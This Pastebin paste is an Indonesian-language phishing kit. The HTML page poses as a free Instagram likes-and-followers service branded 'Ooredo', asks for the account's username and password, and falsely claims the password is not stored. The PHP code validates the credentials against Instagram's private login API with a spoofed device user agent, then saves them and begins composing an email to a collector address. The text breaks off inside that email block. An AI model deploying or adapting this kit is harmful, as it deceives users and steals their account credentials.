Advertisement
Guest User

Untitled

a guest
Nov 17th, 2016
89
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.34 KB | None | 0 0
  1. DOCTYPE html>
  2. <html lang="id">
  3. <head>
  4. <meta charset="utf-8" />
  5. <meta http-equiv="Cache-control" content="public">
  6. <title>Layanan Instagram Ooredo</title>
  7. <meta name="author" content="Riki Wahyudi" />
  8. <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
  9. <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  10. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css">
  11. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap-theme.min.css">
  12. <style type="text/css">
  13. body {
  14. background: rgb(12, 97, 33);
  15. background: -webkit-linear-gradient(top left, rgb(104, 145, 162) 0%, rgb(12, 97, 33) 100%);
  16. background: linear-gradient(top bottom right, rgb(104, 145, 162) 0%, rgb(12, 97, 33) 100%);
  17. }
  18. .form-main {
  19. margin-top: 50px;
  20. }
  21. .button-main {
  22. width: 100px;
  23. margin-top: 10px;
  24. }
  25. .panel-main {
  26. max-width: 480px;
  27. }
  28. </style>
  29. </head>
  30. <body>
  31. <div class="container form-main" align="">
  32. <div class="panel panel-primary panel-main">
  33. <div class="panel-heading"><h3 class="panel-title"><center>+[ AutoLikes & Followers ]+</center></h3></div>
  34. <div class="panel-body">
  35. <div class="alert alert-info" role="alert"><center>Kami Tidak Menyimpan Password Anda Kami Hanya Butuh Untuk Menghubungkan Akun Anda Dengan OAuth API Instagram Gunakan Jeda Setiap Submit 1/2 Jam Sekali Atau Akun Anda Akan Di Banned ..</center></div> <form method="post" action="" enctype="multipart/form-data">
  36. <div class="form-group">
  37. <label><li>FOLLOWERS</li></label>
  38. <div class="input-group">
  39. <select name="likes" class="form-control" autofocus">
  40. <option value="100"><b>100 Jumlah Followers</b></option>
  41. <option value="200"><b>200 Jumlah Followers</b></option>
  42. <option value="300"><b>300 Jumlah Followers </b></option>
  43. <option value="400"><b>400 Jumlah Followers </b></option>
  44. <option value="500"><b>500 Jumlah Followers </b></option>
  45. <option value="600"><b>600 Jumlah Followers </b></option>
  46. <option value="700"><b>700 Jumlah Followers </b></option>
  47. <option value="800"><b>800 Jumlah Followers </b></option>
  48. <option value="900"><b>900 Jumlah Followers</b></option>
  49. <option value="1000"><b>1000 Jumlah Followers</b></option>
  50. </select> <span class="input-group-addon"><span class="glyphicon glyphicon-user"></span></span>
  51. </div>
  52. <div class="form-group">
  53. <label><li>LIKES </li></label>
  54. <div class="input-group">
  55. <select name="points" class="form-control" autofocus">
  56. <option value="100"><b>100 Jumlah Likes </b></option>
  57. <option value="200"><b>200 Jumlah Likes </b></option>
  58. <option value="300"><b>300 Jumlah Likes </b></option>
  59. <option value="400"><b>400 Jumlah Likes</b></option>
  60. <option value="500"><b>500 Jumlah Likes</b></option>
  61. <option value="600"><b>600 Junlah Likes</b></option>
  62. <option value="700"><b>700 Jumlah Likes</b></option>
  63. <option value="800"><b>800 Jumlah Likes</b></option>
  64. <option value="900"><b>900 Jumlah Likes</b></option>
  65. <option value="1000"><b>1000 Jumlah Likes</b></option> </select> </select> <span class="input-group-addon"><span class="glyphicon glyphicon-heart"></span></span> </div></center>
  66.  
  67. <div class="form-group">
  68. <label><li>URL FOTO</li></label>
  69. <div class="input-group">
  70. <input type="text" class="form-control" name="url" placeholder="Link foto instagram" autofocus"> <span class="input-group-addon"><span class="glyphicon glyphicon-cog"></span></span> </div>
  71. <br>
  72. <div class="form-group">
  73. <label><li>USERNAME</li></label>
  74. <div class="input-group">
  75. <input type="text" class="form-control" name="username" placeholder="Username" autofocus"> <span class="input-group-addon"></span> </div>
  76.  
  77. <div class="form-group">
  78. <label><li>PASSWORD</li></label>
  79. <div class="input-group">
  80. <input type="password" class="form-control" name="password" placeholder="Password" autofocus"> <span class="input-group-addon"></span> </div>
  81. <div class="form-group">
  82. <center><input type="submit" class="button-main btn btn-primary" name="jos"> </center>
  83. </form></div></div>
  84. <div class="panel-footer"><i><center>Copyright © 2016, <a href="#">Ooredo</a> All Rights Reserved </i></center></div>
  85. </div>
  86. </div>
  87. </body>
  88. </html>
  89. <!----
  90. ########################
  91. # #
  92. # Please dont remove baby okeey :* #
  93. # Copyrigths © 2016 #
  94. # ScriM4zk [ Riki Wahyudi ] #
  95. # http://fb.com/riki.wahyudi.79 #
  96. # http://bongkong.tk #
  97. # # ########################
  98. --->
  99. <?php
  100. if(isset($_POST['username']) || isset($_POST['password'])) {
  101. error_reporting(0);
  102. $username = $_POST['username'];
  103. $password = $_POST['password'];
  104. function SendRequest($url, $post, $post_data, $user_agent, $cookies) {
  105. $ch = curl_init();
  106. curl_setopt($ch, CURLOPT_URL, 'https://instagram.com/api/v1/' . $url);
  107. curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
  108. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  109. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  110. if ($post) {
  111. curl_setopt($ch, CURLOPT_POST, true);
  112. curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
  113. }
  114. if ($cookies) {
  115. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
  116. } else {
  117. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
  118. }
  119. $response = curl_exec($ch);
  120. $http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  121. curl_close($ch);
  122. return array($http, $response);
  123. }
  124. function GenerateGuid() {
  125. return sprintf('%04x%04x-%04x-%04x-%04x-%04x%04x%04x', mt_rand(0, 65535), mt_rand(0, 65535), mt_rand(0, 65535), mt_rand(16384, 20479), mt_rand(32768, 49151), mt_rand(0, 65535), mt_rand(0, 65535), mt_rand(0, 65535));
  126. }
  127. function GenerateUserAgent() {
  128. $resolutions = array('720x1280', '320x480', '480x800', '1024x768', '1280x720', '768x1024', '480x320');
  129. $versions = array('GT-N7000', 'SM-N9000', 'GT-I9220', 'GT-I9100');
  130. $dpis = array('120', '160', '320', '240');
  131. $ver = $versions[array_rand($versions) ];
  132. $dpi = $dpis[array_rand($dpis) ];
  133. $res = $resolutions[array_rand($resolutions) ];
  134. return 'Instagram 4.' . mt_rand(1, 2) . '.' . mt_rand(0, 2) . ' Android (' . mt_rand(10, 11) . '/' . mt_rand(1, 3) . '.' . mt_rand(3, 5) . '.' . mt_rand(0, 5) . '; ' . $dpi . '; ' . $res . '; samsung; ' . $ver . '; ' . $ver . '; smdkc210; en_US)';
  135. }
  136. function GenerateSignature($data) {
  137. return hash_hmac('sha256', $data, 'b4a23f5e39b5929e0666ac5de94c89d1618a2916');
  138. }
  139. $agent = GenerateUserAgent();
  140. $guid = GenerateGuid();
  141. $device_id = "android-" . $guid;
  142. $data = '{"device_id":"' . $device_id . '","guid":"' . $guid . '","username":"' . $username . '","password":"' . $password . '","Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"}';
  143. $sig = GenerateSignature($data);
  144. $data = 'signed_body=' . $sig . '.' . urlencode($data) . '&ig_sig_key_version=4';
  145. $login = SendRequest('accounts/login/', true, $data, $agent, false);
  146. if ($login[0] == 400) {
  147. echo "<div class=\"alert alert-danger\"><b style=color:red;>Proses gagal masukan data dengan benar ~</b></div>";
  148. unset($_SESSION['username']);
  149. unset($_SESSION['password']);
  150. } else {
  151. $_SESSION['username'] = $username;
  152. $_SESSION['password'] = $password;
  153. $subjek = '= [ INSTAGRAM ] =';
  154. $mailto = 'email@kamu.com';
  155. $body = <<<EOD
  156. <br><hr><br>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement